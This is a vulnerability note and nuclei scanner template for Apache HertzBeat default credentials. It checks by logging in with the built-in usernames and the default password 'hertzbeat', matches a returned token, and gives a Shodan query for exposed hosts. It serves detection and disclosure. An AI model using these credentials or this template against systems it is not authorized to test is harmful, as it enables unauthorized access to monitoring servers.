Vulnerability description
Apache HertzBeat ships with default credentials for its built-in admin account (and for the other built-in accounts). An attacker who can reach the login API can authenticate with those credentials and execute unauthorized operations. The nuclei template below tries the built-in usernames admin, tom, guest and lili with the single default password hertzbeat against /api/account/auth/form and reports a hit when the server answers HTTP 200 with a JSON body that carries a token and a role. The remediation is to change the passwords of the built-in accounts before exposing the instance.
id: apache-hertzbeat-default-login

info:
  name: Apache HertzBeat - Default Credentials
  author: securitytaters,icarot
  severity: high
  description: |
    Apache HertzBeat ships with default credentials for the admin account (and other built-in accounts). An attacker can use them to log in and execute unauthorized operations.
  reference:
    - https://github.com/apache/hertzbeat
  metadata:
    max-request: 4
    verified: true
    shodan-query: title:"HertzBeat"
  tags: apache,hertzbeat,default-login,vuln

variables:
  password: hertzbeat

http:
  - raw:
      - |
        POST /api/account/auth/form HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"type":0,"identifier":"{{username}}","credential":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - admin
        - tom
        - guest
        - lili

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"token":'
          - '{"data":{'
          - 'role":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f6c2ac46d9f094cc709a5c178d8919ea652026a9624cfcf326e6a175e32889b70220138a4cd4f234b5cc6ef47cb953ab485ce6828de0682ab55ced3762796298fb76:922c64590222798bb761d5b6d8e72950